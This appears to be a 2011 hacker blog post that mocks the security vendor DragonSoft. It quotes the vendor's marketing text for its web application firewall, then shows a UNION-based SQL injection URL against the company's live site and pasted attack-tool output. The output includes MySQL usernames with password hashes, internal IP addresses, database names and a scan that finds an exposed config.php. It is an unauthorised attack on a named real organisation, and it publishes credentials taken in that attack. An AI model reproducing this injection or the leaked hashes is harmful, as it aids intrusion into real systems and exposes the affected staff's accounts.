0 DragonSoft Epic Fail :(

Lol a funny site who offer to hes clients protection from attacking sites like SQL Injection , XSS , BoF etc ...
but relly why not have secure hes site :( Ohh noo
And nice logo

So DragonSoft say :

http://www.dragonsoft.com/product/01.php

What is DragonWAF ?

DragonWAF is a host-based web application firewall using filtration algorithms, it targets to filter and prevent malicious coding attacks and defacements aiming at personal, SMB and corporate web sites that are hosted on Microsoft IIS Web Servers. The attack patterns and sources are recorded despite the encryption status of the attacking word strings, DragonWAF records by date, incoming IP addresses, attack types. The data are transformed into graphical reports which allows web masters to take easy control and security managements on their IIS Web Servers.

Best Web Server Protection Solution for SMB

DragonWAF proactively filter all known and unknown vulnerability attacks, protect web server security. DragonSoft offers best reasonable price package to SMB websites against malicious attacks and web defacements. Website malicious attack & injection filtration Customizable Remote Warning Page SQL Injection Prevention Buffer Overflow Protection OWASP/PCI-DSS 6.6 compliant Shellcode Exploits Prevention HTTP Allowed Methods Prevention Encoding Attack Prevention Directory Traversal Prevention Keyword Strings Filtration Cross Site Scripting, (XSS) Attack Prevention AJAX Attack Prevention X Path Attack Prevention XML Attack Prevention Allow Directory Prevention Support SSL websites ------------------------ But Not really  Let me tell something :) Bigies Fail  [+] URL: http://www.dragonsoft.com/events/list.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,5,6 [+] 22:45:00 [+] Evasion: + -- [+] Cookie: None [+] SSL: No [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1) [+] Gathering MySQL Server Configuration... Database: dragonsoft User: www@192.168.0.201 Version: 5.1.47-log [+] Do we have Access to MySQL Database: YES <-- w00t w00t [+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 16 [0] localhost:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4 [1] test.dragonsoft:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4 [2] 127.0.0.1:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4 [3] 192.168.0.%:www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD [4] localhost:webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E [5] localhost:www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD [6] localhost:dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18 [7] 192.168.0.%:kay:*B0AC41A8F1A5FB7AC4A313B1A4A65F3038A343C5 [8] 192.168.0.%:george:*6B05113CA60CA58DD62D7ED34941F68C6968B108 [9] 192.168.0.%:linus:*F1854B79E7636559FC27CB27AEFAF100B556DCBD [10] 192.168.0.%:webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E [11] 192.168.0.%:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4 [12] 192.168.0.%:repl:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD [13] 192.168.0.%:walter:*BDF7F6F2BF488168D5B4C2C87DB50FF1863B1E4D [14] localhost:tony:*47318AF21EAB59984F5D7599F76191B6F4C32B7E [15] 192.168.0.%:tony:*C617F3F58E152DBD282903477F1B5CAA255F0C10 [+] Showing all databases current user has access too! [+] Number of Databases: 13 [1] A-VAC [2] calendar [3] dragonsoft [4] ds [5] dsdz [6] mysql [7] order [8] phpwind [9] smb_reg [10] test [11] waf [12] wp_reg [13] wp_reg_old [-] [22:45:30] [-] Total URL Requests: 20 [-] Done Scanning for any admin folder or file but nothing [ + ] URL : http://www.dragonsoft.com/ [ + ] Date: Sat May 28 22:56:31 2011 [ + ] Scanning. . . . . http://www.dragonsoft.com/file --------> ( 403 Forbidden ) -- ( 403 Forbidden ) http://www.dragonsoft.com/include --------> ( 403 Forbidden ) -- ( 403 Forbidden ) http://www.dragonsoft.com/js --------> ( 403 Forbidden ) -- ( 403 Forbidden ) http://www.dragonsoft.com/css --------> ( 403 Forbidden ) -- ( 403 Forbidden ) http://www.dragonsoft.com/doc --------> ( 403 Forbidden ) -- ( 403 Forbidden ) http://www.dragonsoft.com/config.php --------> ( 200 OK ) -- ( ) [ + ] Done ! - End Scanning ! *-----------------------------------------------------------------------------* How this is Posible ? All users of mysql and easy SQLi Injection Not protected with any Fucking WAF ..